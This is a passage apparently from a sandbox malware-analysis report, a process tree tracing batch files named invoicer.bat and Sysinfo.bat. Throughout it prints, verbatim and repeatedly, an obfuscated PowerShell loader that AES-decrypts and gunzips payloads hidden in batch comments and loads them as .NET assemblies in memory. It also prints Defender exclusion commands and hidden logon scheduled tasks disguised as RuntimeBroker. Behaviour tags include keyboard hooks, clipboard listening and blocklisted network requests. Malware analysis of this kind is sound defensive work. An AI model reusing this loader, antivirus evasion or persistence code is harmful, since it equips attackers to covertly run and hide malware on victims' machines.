System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3716
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_478_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_478.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:324
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_478.vbs"
        6⤵
        Checks computer location settings
        
        PID:1212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_478.bat" "
        7⤵
        
        PID:964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_478.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5092
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_713_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_713.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3624
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_713.vbs"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_713.bat" "
        6⤵
        
        PID:808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_713.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_633_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_633.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4460
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_633.vbs"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3476
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_633.bat" "
        6⤵
        
        PID:1088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_633.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_670_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_670.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1540
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_670.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_670.bat" "
        5⤵
        
        PID:1036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_670.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_41_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_41.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3832
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_41.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1032
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_41.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3936
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_41.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function 